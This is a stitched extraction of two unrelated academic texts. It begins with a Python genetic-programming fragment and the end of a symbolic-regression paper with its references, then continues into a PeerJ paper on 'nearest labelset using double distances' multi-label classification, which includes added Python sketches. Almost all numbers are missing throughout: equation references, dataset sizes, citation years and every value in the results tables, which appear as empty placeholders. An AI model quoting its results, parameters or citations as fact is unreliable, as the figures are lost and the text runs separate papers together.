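def mutate(tree):
    """replace a randomly chosen subtree with a freshly generated one."""
    return replace_at(tree, random.choice(paths(tree)), random_tree(depth=2))

def crossover(a, b):
    """swap random subtrees between two parents, yielding two children."""
    pa, pb = random.choice(paths(a)), random.choice(paths(b))
    sub_a, sub_b = a, b
    for i in pa:
        sub_a = sub_a[i]
    for i in pb:
        sub_b = sub_b[i]
    return replace_at(a, pa, sub_b), replace_at(b, pb, sub_a)

# tiny usage example: breed a small random population and inspect sizes
population = [random_tree() for _ in range(5)]
child1, child2 = crossover(population[0], population[1])
print([size(t) for t in population], size(mutate(child1)),
      evaluate(child2, theta=0.5, theta_dot=0.1))
```

in a full search these operators would be driven by the spea selection step, with the least-action and node-count scores supplying the two objectives.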
further, the search space of possible expressions is exceedingly large, and the score is not very smooth with respect to the genetic operations. as a result, the search must run for many generations and is extremely computationally expensive. a naïve implementation might calculate the partial derivative time-series in eq. ( ) by symbolically differentiating the candidate expression and then calculating the value of the derivative. this, however, can be exponentially expensive in the depth of the expression, in terms of both memory and runtime. a better approach, which we adopt in this work, is to simultaneously evaluate the expression's value and its derivatives using automatic differentiation (kalman, ). this method avoids calculating an expression for the derivative, and has run-time proportional to the size of the expression. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • daniel j.a. hills and adrian m. grütter performed the experiments, analyzed the data, performed the computation work, reviewed drafts of the paper. • jonathan j. hudson conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: https://github.com/jonyepsilon/flow. references atlas collaboration. . observation of a new particle in the search for the standard model higgs boson with the atlas detector at the lhc. physics letters b. bradley e, easley m, stolle r. . reasoning about nonlinear system identification. artificial intelligence. clegg j, dawson j, porter s, barley m. . the use of a genetic algorithm to optimize the functional form of a multi-dimensional polynomial fit to experimental data. the ieee congress on evolutionary computation. dzeroski s, todorovski l. . discovering dynamics. in: proc. tenth international conference on machine learning. san mateo: morgan kaufmann publishers inc. euler l. . methodus inveniendi lineas curvas maximi minive proprietate gaudentes. bousquet, lausanne & geneva. feynman r, leighton r, sands m. . the feynman lectures on physics. 2nd edition. boston: addison-wesley. gao f, han l. . implementing the nelder-mead simplex algorithm with adaptive parameters. computational optimization and applications. hayden ec. . is the $ , genome for real? nature. hillar c, sommer f. . comment on the article "distilling free-form natural laws from experimental data". arxiv preprint. hudson jj, hills dja, grütter am. flow project code. available at https://github.com/jonyepsilon/flow. kalman d. . doubly recursive multivariate automatic differentiation. mathematics magazine. koza jr. . genetic programming: on the programming of computers by means of natural selection. cambridge: mit press. langley p. . rediscovering physics with bacon. in: proceedings of the th international joint conference on artificial intelligence.
san francisco: morgan kaufmann publishers inc. ljung l. . perspectives on system identification. annual reviews in control. maupertuis plm de. . accord de différentes lois de la nature qui avaient jusqu'ici paru incompatibles. mém. as. sc. paris. nelder ja, mead r. . a simplex method for function minimization. the computer journal. newman r, tseng j. memo: cloud computing and the square kilometre array. available at http://www.skatelescope.org/uploaded/ _ _memo_newman.pdf. schmidt m, lipson h. . distilling free-form natural laws from experimental data.
science. schmidt m, lipson h. . symbolic regression of implicit equations. in: riolo r, o'reilly u-m, mcconaghy t, eds. genetic programming theory and practice vii, genetic and evolutionary computation. springer. sjöberg j, zhang q, ljung l, benveniste a, delyon b, glorennec p-y, hjalmarsson h, juditsky a. . nonlinear black-box modeling in system identification: a unified overview. automatica. todorovski l, dzeroski s. . declarative bias in equation discovery. in: proc. fourteenth international conference on machine learning. san mateo: morgan kaufmann publishers inc. zitzler e, laumanns m, thiele l. . in: giannakoglou k, et al., eds. evolutionary methods for design, optimisation and control with application to industrial problems (eurogen). international center for numerical methods in engineering (cimne).
submitted august, accepted november, published december. corresponding author hyukjun gweon, hgweon@uwo.ca. academic editor diego amancio. additional information and declarations can be found at the end of the article. copyright gweon et al., distributed under creative commons cc-by. open access. nearest labelset using double distances for multi-label classification. hyukjun gweon, matthias schonlau and stefan h. steiner. department of statistical and actuarial sciences, university of western ontario, london, ontario, canada; department of statistics and actuarial science, university of waterloo, waterloo, ontario, canada. abstract multi-label classification is a type of supervised learning where an instance may belong to multiple labels simultaneously. predicting each label independently has been criticized for not exploiting any correlation between labels. in this article we propose a novel approach, nearest labelset using double distances (nldd), that predicts the labelset observed in the training data that minimizes a weighted sum of the distances in both the feature space and the label space to the new instance. the weights specify the relative tradeoff between the two distances. the weights are estimated from a binomial regression of the number of misclassified labels as a function of the two distances. model parameters are estimated by maximum likelihood. nldd only considers labelsets observed in the training data, thus implicitly taking into account label dependencies. experiments on benchmark multi-label data sets show that the proposed method on average outperforms other well-known approaches in terms of 0/1 loss and multi-label accuracy, and ranks second on the f-measure (after a method called ecc) and on hamming loss (after a method called rf-pct). subjects data mining and machine learning, data science keywords multi-label classification, label correlations, nearest neighbor introduction in multi-label classification, an instance can belong to multiple labels at the same time. this is different from multi-class or binary classification, where an instance can only be associated with a single label.
for example, a newspaper article talking about electronic books may be labelled with multiple topics such as business, arts and technology simultaneously. multi-label classification has been applied in many areas of application including text (schapire & singer, ; godbole & sarawagi, ), image (boutell et al., ; zhang & zhou, ), music (li & ogihara, ; trohidis et al., ) and bioinformatics (elisseeff & weston, ). a labelset for an instance is the set of all labels that are associated with that instance. approaches for solving multi-label classification problems may be categorized into either problem transformation methods or algorithm adaptation methods (tsoumakas & katakis, ). problem transformation methods transform a multi-label problem into one or more single-label problems. for the single-label classification problems, binary or multi-class classifiers are used. the results are combined and transformed back into a multi-label representation. algorithm adaptation methods, on the other hand, modify specific learning algorithms directly for multi-label problems. tsoumakas, katakis & vlahavas ( ), madjarov et al. ( ) and zhang & zhou ( ) give overviews of multi-label algorithms and evaluation metrics. in this article, we propose a new problem transformation approach to multi-label classification. our proposed approach applies the nearest neighbor method to predict the label with the shortest distance in the feature space. however, because we have multiple labels, we additionally consider the shortest (euclidean) distance in the label space, where the input of the test instance in the label space consists of probability outputs obtained by independent binary classifiers. we then find the labelset that minimizes the expected label misclassification rate as a function of both the feature-space and label-space distances, thus exploiting high-order interdependencies between labels. the nonlinear function is estimated using maximum likelihood. the effectiveness of the proposed approach is evaluated with various multi-label data sets. our experiments show that the proposed method performs on average better on standard evaluation metrics (hamming loss, 0/1 loss, multi-label accuracy and the f-measure) than other commonly used algorithms. the rest of this article is organized as follows: in 'related work' we review previous work on multi-label classification. in 'the nearest labelset using double distances approach', we present the details of the proposed method. in 'experimental evaluation', we report on experiments that compare the proposed method with other algorithms on standard metrics. in 'discussion' we discuss the results. in 'conclusion', we draw conclusions. related work in this section, we briefly review the multi-label approaches that are existing competitors to the proposed method. there are several approaches to classifying multi-label data. the most common approach, binary relevance (br) (zhang & zhou, ; tsoumakas & katakis, ), transforms a multi-label problem into separate binary problems.
that is, using training data, br constructs a binary classifier for each label independently. for a test instance, the predicted set of labels is obtained simply by combining the individual binary results. in other words, the predicted labelset is the union of the results predicted from the l binary models. this approach requires one binary model for each label. the method has been adapted in many domains including text (gonçalves & quaresma, ), music (li & ogihara, ) and images (boutell et al., ). one drawback of the basic binary approach is that it does not account for any correlation that may exist between labels, because the labels are modelled independently. taking correlations into account is often critical for prediction in multi-label problems (godbole & sarawagi, ; ji et al., ). subset-mapping (smbr) (schapire & singer, ; read et al., ) is a method related to br. for a new instance, labels are first predicted by the binary outputs of br. the final prediction is then the training labelset with the shortest hamming distance to the predicted labelset. smbr thus makes predictions by selecting labelsets observed in the training data; it is a nearest neighbor approach in the label space (from the set of predicted labels to the sets of labels observed in the training data) with hamming distance as the distance metric. an extension of binary relevance is the classifier chain (cc) (read et al., ). cc fits labels sequentially using binary classifiers. labels already predicted are included as features in subsequent classifiers until all labels have been fit. including previous predictions as features 'chains' the classifiers together and also takes into account potential label correlations. however, the order of the labels in a chain affects the predictive performance. read et al. ( ) also introduced the ensemble of classifier chains (ecc), where multiple ccs are built with re-sampled training sets. the order of the labels in each cc is randomly chosen. the prediction of an ecc is obtained by the majority vote of the cc models. label powerset learning (lp) transforms a multi-label classification problem into a multi-class problem (tsoumakas & katakis, ). in other words, lp treats each labelset as a single label. the transformed problem requires a single classifier. although lp captures correlations between labels, the number of classes in the transformed problem increases exponentially with the number of original labels. lp can only choose observed labelsets for predictions (tsoumakas & katakis, ; read, pfahringer & holmes, ). the random k-labelsets method (rakel) (tsoumakas & vlahavas, ) is a variation on the lp approach. in a multi-label problem with l different labels, rakel employs m multi-class models, each of which considers k (≤ l) randomly chosen labels rather than the entire labelset. for a test instance, the predicted labelset is obtained by the majority vote of the results based on the m models. rakel overcomes the problem that the number of multinomial classes increases exponentially as a function of the number of labels. it also considers interdependencies between labels by using multi-class models with subsets of the labels.
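the binary relevance and classifier chain strategies described above can be sketched in a few lines. the snippet below is only an illustration under assumed choices (python with scikit-learn logistic regression and toy data); the paper itself uses svm base classifiers with platt scaling in r, not this setup.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(0)
X = rng.normal(size=(200, 10))                      # toy feature matrix
Y = (rng.random(size=(200, 3)) < 0.3).astype(int)   # toy 0/1 labels, L = 3

# binary relevance: one independent probabilistic classifier per label
br_models = [LogisticRegression(max_iter=1000).fit(X, Y[:, j])
             for j in range(Y.shape[1])]
br_probs = np.column_stack([m.predict_proba(X)[:, 1] for m in br_models])
br_pred = (br_probs >= 0.5).astype(int)             # union of per-label decisions

# classifier chain: label j additionally sees labels 0..j-1 as extra features
chain_models = []
for j in range(Y.shape[1]):
    X_aug = np.hstack([X, Y[:, :j]])                # augment with earlier labels
    chain_models.append(LogisticRegression(max_iter=1000).fit(X_aug, Y[:, j]))

def chain_predict(x):
    """predict one instance, feeding each prediction into the next model."""
    labels = []
    for model in chain_models:
        x_aug = np.hstack([x, labels])
        labels.append(int(model.predict(x_aug.reshape(1, -1))[0]))
    return np.array(labels)

print(br_pred[0], chain_predict(X[0]))
```

the chain's dependence on label order, and the ensembling used by ecc to average over random orders, follow directly from this construction.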
a hierarchy of multi-label classifiers (homer) (tsoumakas, katakis & vlahavas, ) constructs a tree-shaped hierarchy by partitioning the labels recursively into smaller disjoint subsets (i.e., nodes) using a balanced clustering algorithm, which extends the k-means algorithm with an additional constraint on the size of each cluster. after that, homer constructs a multi-label classifier for the labelsets in each node. for the prediction of a new instance, homer follows a top-down recursive process from the root. a classifier on a non-root node is called only if the prediction of its parent node is positive. the final labelset is determined by the positive leaves (i.e., labels) whose parent nodes are all positive. a popular lazy learning algorithm based on the k nearest neighbours (knn) approach is mlknn (zhang & zhou, ). like other knn-based methods, mlknn identifies the k nearest training instances in the feature space for a test instance. then, for each label, mlknn estimates the prior and likelihood for the number of neighbours associated with the label. using bayes' theorem, mlknn calculates the posterior probability from which a prediction is made. the conditional bernoulli mixtures (cbm) (li et al., ) approach transforms a multi-label problem into a mixture of binary and multi-class problems. cbm divides the feature space into k regions and learns a multi-class classifier for the regional components as well as binary classifiers in each region. the posterior probability for a labelset is obtained by mixing the multi-class and multiple binary classifiers. the model parameters are estimated using the expectation-maximization algorithm. figure: an illustration of the label space when l = 3. each vertex represents a labelset. the inner point represents a fitted vector of an instance. dyi represents the distance between p̂ and yi. multi-target classification approaches may also be used for multi-label classification. a number of multi-target learning methods use the predictive clustering tree (pct) (blockeel, raedt & ramon, ) as the base classifier. random forest of predictive clustering trees (rf-pct) (kocev et al., ) has been shown to be competitive (madjarov et al., ). rf-pct is a tree-based ensemble method using pcts as base classifiers. different pcts are constructed from different bootstrap samples and random subsets of the features. the nearest labelset using double distances approach hypercube view of a multi-label problem in multi-label classification, we are given a set of possible output labels {1, 2, ..., l}. each instance with a feature vector x ∈ r^d is associated with a subset of these labels. equivalently, the subset can be described as y = (y(1), y(2), ..., y(l)), where y(i) = 1 if label i is associated with the instance and y(i) = 0 otherwise. a multi-label training data set is described as t = {(xi, yi)}, i = 1, ..., n. any labelset y can be described as a vertex in the l-dimensional unit hypercube (tai & lin, ). each component y(i) of y represents an axis of the hypercube. as an example, the figure above illustrates the label space of a multi-label problem with three labels (y(1), y(2), y(3)). assume that the presence or absence of each label is modeled independently with a probabilistic classifier.
for a new instance, the classifiers provide the probabilities p(1), ..., p(l) that the corresponding labels are associated with the instance. using the probability outputs, we may form the l-dimensional vector p̂ = (p(1), p(2), ..., p(l)). every element of p̂ has a value between 0 and 1, and the vector p̂ is an inner point of the hypercube (see the figure above). given p̂, the prediction task is completed by assigning the inner point to a vertex of the cube. for the new instance, we may calculate the euclidean distance, dyi, between p̂ and each yi (i.e., the labelset of the ith training instance). in that figure, three training instances y1, y2 and y3 and the corresponding distances are shown. a small distance dyi indicates that yi is likely to be the labelset for the new instance. nearest labelset using double distances (nldd) in addition to computing the distance in the label space, dyi, we may also obtain the (euclidean) distance in the feature space, denoted by dxi. the proposed method, nldd, uses both dx and dy as predictors to find a training labelset that minimizes the expected loss. for each test instance, we define the loss as the number of misclassified labels out of the l labels. the expected loss is then l·θ, where θ = g(dx, dy) represents the probability of misclassifying each label. the predicted labelset, ŷ*, is the labelset observed in the training data that minimizes the expected loss: ŷ* = argmin over y ∈ t of l·g(dx, dy) (1). the loss follows a binomial distribution with l trials and parameter θ. we model θ = g(dx, dy) using binomial regression. specifically, log(θ/(1 − θ)) = β0 + β1·dx + β2·dy (2), where β0, β1 and β2 are the model parameters. greater values of β1 and β2 imply that θ is more sensitive to the distances in the feature and label spaces, respectively. the misclassification probability decreases as dx and dy approach zero. a test instance with dx = dy = 0 has a duplicate instance in the training data (i.e., with identical features), and the predicted probabilities for the test instance are either 0 or 1 and match the labels of the duplicate training observation. for such a 'double-duplicate' instance (i.e., dx = dy = 0), the probability of misclassification is 1/(1 + e^(−β0)) > 0. as expected, the uncertainty of a test observation with a 'double-duplicate' training observation is greater than zero. this is not surprising: duplicate training observations do not necessarily have the same response, and neither do double-duplicate observations. the model in eq. (2) implies g(dx, dy) = 1/(1 + e^(−(β0 + β1·dx + β2·dy))). because log(θ/(1 − θ)) is a monotone transformation of θ and l is a constant, the minimization problem in eq. (1) is equivalent to ŷ* = argmin over (x, y) ∈ t of β1·dx + β2·dy (3). that is, nldd predicts by choosing the labelset of the training instance that minimizes the weighted sum of the distances. for prediction, the only remaining issue is how to estimate the weights. estimating the relative weights of the two distances the weights β0, β1 and β2 can be estimated using binomial regression. binomial regression can be fit by running separate logistic regressions, one for each of the l labels. the data set is split equally for training and testing. an unequal split is not desirable: adding more instances to the internal training set may improve the performance of the individual probabilistic classifiers.
however, this would lead to a decrease in the number of distance pairs that are needed for the binomial regression modeling (the number of distance pairs is the square of the number of instances in the internal validation set). that is, reducing the size of the validation set will decrease the amount of data used for the binomial regression.
algorithm 1: the training process of nldd
input: training data t, number of labels l
output: probabilistic classifiers h(i), binomial regression g
  split t into t1 and t2
  for i = 1 to l do
    train probabilistic classifier h(i) based on t
    train probabilistic classifier h(i)* based on t1
  end for
  s, w ← ∅
  for each instance in t2 do
    obtain p̂ = (h(1)*(x), ..., h(l)*(x))
    for each instance in t1 do
      compute dx and dy
      w ← w ∪ (dx, dy)
    end for
    find mi1, mi2 ∈ w
    update s ← s ∪ {mi1, mi2}
  end for
  fit log(θ/(1 − θ)) = β0 + β1·dx + β2·dy to s
  obtain g: s → θ̂ = e^f̂/(1 + e^f̂), where f̂ = β̂0 + β̂1·dx + β̂2·dy
algorithm 2: the classification process of nldd
input: new instance x, binomial model g, probabilistic classifiers h(i), training data t of size n
output: multi-label classification vector ŷ
  for j = 1 to n do
    compute p̂ = (h(1)(x), ..., h(l)(x))
    compute dxj and dyj
    obtain θ̂j ← g(dxj, dyj)
  end for
  return ŷ ← argmin over yj ∈ t of θ̂j
to run the regressions, dx and dy need to be computed on the training data. for this purpose we split the training data (t) equally into an internal training data set, t1, and an internal validation data set, t2. we next fit a binary classifier to each of the l labels separately and obtain the labelset predictions (i.e., probability outcomes) for the instances in t2. in principle, each observation in t2 can be paired with each observation in t1, creating a (dx, dy) pair, and the regression can be run on all possible pairs. note that matching any single instance in t2 to those in t1 results in n/2 distance pairs. however, most of the pairs are uninformative because the distance in either the feature space or the label space is very large. since candidate labelsets for the final prediction will have a small dy and a small dx, it is reasonable to focus on the behavior of the loss at small values of dx and dy rather than over the entire range of the distances. moreover, since t1 contains n/2 instances, the total number of possible pairs is potentially large (n²/4). therefore, to reduce computational complexity, for each instance we only identify two pairs: the pair with the smallest distance in x and the pair with the smallest distance in y. in case of ties in one distance, the pair with the smallest value in the other distance is chosen. more formally, we identify the first pair mi1 as mi1 = argmin over (dx, dy) ∈ wix of dy, where wix is the set of pairs that are tied, i.e., that each correspond to the minimum distance in dx. similarly, the second pair mi2 is found by mi2 = argmin over (dx, dy) ∈ wiy of dx, where wiy is the set of pairs that are tied with the minimal distance in dy. the figure below illustrates an example of how to identify mi1 and mi2. figure: an illustration of how to identify mi1 and mi2; t1 and t2 contain the same number of instances. the points in the scatter plot were obtained by calculating dx and dy between a single instance in t2 and the instances in t1. in this example two points have the lowest distance in dy and are candidates for mi2; among the candidates, the point with the lowest dx is chosen.
our goal was to identify the instance with the smallest distance in x and the instance with the smallest distance in y. note that mi1 and mi2 may be the same instance. if we find a single instance that minimizes both distances, we use just that instance (a possible duplication of that instance is unlikely to make any difference in practice).
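before these pairs are collected into the regression data set s (next paragraph), the selection rule just described can be illustrated with a small numpy sketch. this is not the authors' code: the function name, toy data, and the use of lexicographic tuple ordering for tie-breaking are assumptions made for illustration.

```python
import numpy as np

def two_pairs(x_val, p_val, X_train, Y_train):
    """return the (d_x, d_y) pairs mi1 and mi2 for one validation instance.

    x_val:   standardized feature vector of the validation instance (from t2)
    p_val:   vector of predicted label probabilities for that instance
    X_train: standardized features of the internal training set t1
    Y_train: 0/1 label matrix of t1
    """
    d_x = np.linalg.norm(X_train - x_val, axis=1)   # distances in feature space
    d_y = np.linalg.norm(Y_train - p_val, axis=1)   # distances in label space

    # mi1: minimum d_x, ties resolved by the smaller d_y
    mi1 = min(zip(d_x, d_y))
    # mi2: minimum d_y, ties resolved by the smaller d_x
    d_y_best, d_x_best = min(zip(d_y, d_x))
    mi2 = (d_x_best, d_y_best)
    return mi1, mi2

# toy usage: 4 training instances with 2 features and 3 labels
X1 = np.array([[0.0, 0.0], [1.0, 0.0], [0.0, 1.0], [2.0, 2.0]])
Y1 = np.array([[1, 0, 0], [1, 1, 0], [0, 0, 1], [1, 1, 1]])
mi1, mi2 = two_pairs(np.array([0.1, 0.0]), np.array([0.9, 0.2, 0.1]), X1, Y1)
print(mi1, mi2)   # the two (d_x, d_y) pairs contributed to the regression data
```

when the same point minimizes both distances, the two returned pairs coincide, matching the remark above that mi1 and mi2 may be the same instance.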
table multi-label data sets and their associated characteristics. label cardinality (lcards) is the aver- age number of labels associated with an instance. name domain labels (|l|) features (|x|) examples (|e|) lcards emotions music . scene image , . yeast biology , . medical text , . slashdot text , , . enron text , , . ohsumed text , , . tmc text , . bibtex text , , . ‘‘amazed-surprised’’ and ‘‘happy-pleased’’. the scene data set (boutell et al., ) consists of images with visual features. each image is associated with up to labels including ‘‘mountain’’, ‘‘urban’’ and ‘‘beach’’. the yeast data set (elisseeff & weston, ) contains , yeast genes in the yeast saccharomyces cerevisiae. each gene is represented by features and is associated with a subset of functional labels. the medical data set consists of documents that describe patient symptom histories. the data were made available in the medical natural language processing challenge in . each document is associated with a set of disease codes. the slashdot data set consists of , text instances with labels obtained from slashdot.org. the enron data set (klimt & yang, ) contains , email messages from the enron corporation employees. the emails were categorized into labels. the ohsumed data set (hersh et al., ) is a collection of medical research articles from medline database. we used the same data set as in (read et al., ) that contains , instances and labels. the tmc data set (srivastava & zane-ulman, ) contains , aviation safety reports associated with up to labels. following tsoumakas, katakis & vlahavas ( ), we used a reduced version of the data set with features. the bibtex data set (katakis, tsoumakas & vlahavas, ) consists of , bibtex entries for automated tag suggestion. the entries were classified into labels. all data sets are available online at: mulan (http://mulan.sourceforge.net/datasets-mlc.html) and meka (http://meka.sourceforge.net/#datasets). evaluation metrics multi-label classifiers can be evaluated with various loss functions. here, four of the most popular criteria are used: hamming loss, / loss, multi-label accuracy and f-measure. these criteria are defined in the following paragraphs. let l be the number of labels in a multi-label problem. for a particular test instance, let y= (y( ),...,y(l)) be the labelset where y(j) = if the jth label is associated with the instance and otherwise. let ŷ= (ŷ( ),...,ŷ(l)) be the predicted values obtained by any machine learning method. hamming loss refers to the percentage of incorrect labels. the gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://mulan.sourceforge.net/datasets-mlc.html http://meka.sourceforge.net/#datasets http://dx.doi.org/ . /peerj-cs. hamming loss for the instance is hamming loss= − l l∑ j= {y(j)= ŷ(j)} where is the indicator function. despite its simplicity, the hamming loss may be less discriminative than other metrics. in practice, an instance is usually associated with a small subset of labels. as the elements of the l-dimensional label vector are mostly zero, even the empty set (i.e., zero vector) prediction may lead to a decent hamming loss. the / loss is if all predicted labels match the true labels and otherwise. hence, / loss= − {y= ŷ}. compared to other evaluation metrics, / loss is strict as all the l labels must match to the true ones simultaneously. 
the multi-label accuracy (godbole & sarawagi, ) (also known as the jaccard index) is defined as the number of labels counted in the intersection of the predicted and true labelsets divided by the number of labels counted in the union of the labelsets. that is, multi-labelaccuracy = |y∩ŷ| |y∪ŷ| . the multi-label accuracy measures the similarity between the true and predicted labelsets. the f-measure is the harmonic mean of precision and recall. the f-measure is defined as f-measure= |y∩ŷ| |y|+|ŷ| . the metrics above were defined for a single instance. on each metric, the overall value for an entire test data set is obtained by averaging out the individual values. experimental setup we compared our proposed method against br, smbr, ecc, rakel, homer, rf-pct , mlknn and cbm. to train multi-label classifiers, the parameters recommended by the authors were used, since they appear to give the best (or comparable to the best) performance in general. in the case of mlknn , we set the number of neighbors and the smoothing parameter to and respectively. for rakel, we set the number of separate models to l and the size of each sub-labelset to . for ecc, the number of cc models for each ensemble was set to . for homer, the number of clusters was set to as used in liu et al. ( ). on the larger data sets (ohsumed, tmc and bibtex), we fit ecc using reduced training data sets ( % of the instances and % of the features) as suggested in read et al. ( ). on the same data sets, we ran nldd using % of the training data to reduce redundancy in learning. for nldd, we used support vector machines (svm) (vapnik, ) as the base classifier on unscaled variables with a linear kernel and tuning parameter c = . the svm scores were converted into probabilities using platt’s method (platt, ). the analysis was conducted in r (r core team, ) using the e package (meyer et al., ) for gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table hamming loss (lower is better) averaged over cross validations (with ranks in parentheses). the data sets are ordered as in table . data br smbr nldd ecc rakel homer rf-pct mlknn cbm emotions . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) scene . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) yeast . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) medical . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) slashdot . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) enron . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) ohsumed . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) tmc . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) bibtex . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) av. ranks . . . . . . . . . svm. for the data sets with less than , instances -fold cross validations (cv ) were performed. on the larger data sets, we used / train/test splits. for fitting binomial regression models, we divided the training data sets at random into two parts of equal sizes. for rf-pct , we used the clus (http://clus.sourceforge.net) system. in the pre-pruning strategy of pct , the significance level for the f-test was automatically chosen from { . , . , . , . , . , . } using a reserved prune-set. for cbm, we used the authors’ java program (https://github.com/cheng-li/pyramid). the default settings (e.g., logistic regression and iterations for the em algorithm) were used on non-large data sets. 
for the large data sets tmc and bibtex, the number of iterations was set to and random feature reduction was applied as suggested by the developers. on each data set we used the train/test split recommended at their website (https://github.com/cheng-li/pyramid). to test the hypothesis that all classifiers perform equally, we used the friedman test as recommended by demšar ( ). we then compared nldd with each of the other methods using wilcoxon signed-rank tests (wilcoxon, ). we adjusted p-values for multiple testing using hochberg’s method (hochberg, ). in nldd, when calculating distances in the feature spaces we used the standardized features so that no particular features dominated distances. for a numerical feature variable x, the standardized variable z is obtained by z =(x− x̄)/sd(x) where x̄ and sd(x) are the mean and standard deviation of x in the training data. results tables to summarize the results in terms of hamming loss, / loss, multi-label accuracy and f-measure, respectively. we also ranked the algorithms for each metric. according to the friedman tests, the classifiers are not all equal (p< . ). the post-hoc analysis - adjusted for multiple testing - showed that nldd performed significantly better than br and smbr on all metrics, significantly better than rakel and mlknn on all but hamming loss, significantly better than homer on hamming loss and / loss, and significantly better than ecc and rf-pct on / loss. no method performed statistically significantly better than nldd on any evaluation metric. gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://clus.sourceforge.net https://github.com/cheng-li/pyramid https://github.com/cheng-li/pyramid http://dx.doi.org/ . /peerj-cs. table / loss (lower is better) averaged over cross validations (with ranks in parentheses). the loss is if a predicted labelset matches the true labelset exactly and otherwise. data br smbr nldd ecc rakel homer rf- pct mlknn cbm emotions . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) scene . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) yeast . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) medical . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) slashdot . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) enron . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) ohsumed . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) tmc . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) bibtex . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) av. ranks . . . . . . . . . table multi- label accuracy (higher is better) averaged over cross validations (with ranks in parentheses). data br smbr nldd ecc rakel homer rf- pct mlknn cbm emotions . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) scene . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) yeast . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) medical . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) slashdot . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) enron . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) ohsumed . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) tmc . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) bibtex . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) av. ranks . . . . . . . . . table f-measure (higher is better) averaged over cross validations (with ranks in parentheses). data br smbr nldd ecc rakel homer rf-pct mlknn cbm emotions . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) scene . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . 
( ) . ( ) yeast . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) medical . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) slashdot . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) enron . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) ohsumed . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) tmc . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) bibtex . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) av. ranks . . . . . . . . . gweon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table evaluation results on the bibtex data set by whether or not the labelset was observed (subset a) or unobserved (subset b) in the training data. subset a contains % of the test instances and subset b contains %. for hamming loss and / loss, lower is better. for multi-label accuracy and f-measure, higher is better. subset a subset b total (a∪b) br nldd br nldd br nldd hamming loss . . . . . . / loss . . . . . . multi-label accuracy . . . . . . f-measure . . . . . . nldd achieved lowest (i.e., best) average ranks on / loss and multi-label accuracy, while ecc and rf-pct achieved the lowest average ranks on the f-measure and hamming loss, respectively. on both f-measure and hamming loss, nldd achieved the second lowest (i.e., best) average ranks. cbm achieved the second lowest average rank on / loss and multi-label accuracy. the performance of cbm on the / loss was very variable achieving the lowest rank on five out of nine data sets and the second worst on two data sets. we next look at the performance of nldd by whether or not the true labelsets were observed in the training data. a labelset has been observed if the exact labelset can be found in the training data and unobserved otherwise. since nldd makes a prediction by choosing a training labelset, a predicted labelset can only be partially correct on an unobserved labelset. table compares the evaluation results of br and nldd on two separate subsets of the test set of the bibtex data. the bibtex data were chosen because the data set contains by far the largest percentage of unobserved labelsets ( %) among the data sets investigated. the test data set was split into subsets a and b; if the labelset of a test instance was an observed labelset, the instance was assigned to a; otherwise the instance was assigned to b. for all of the four metrics, nldd outperformed br even though % of the labelsets in the test data were unobserved labelsets. we next look at the three regression parameters the proposed method (nldd) estimated (eq. ( )) for each data set in more detail. table displays the mle of the parameters of the binomial model in each data set. in all data sets, the estimates of β and β were all positive. the positive slopes imply that the expected 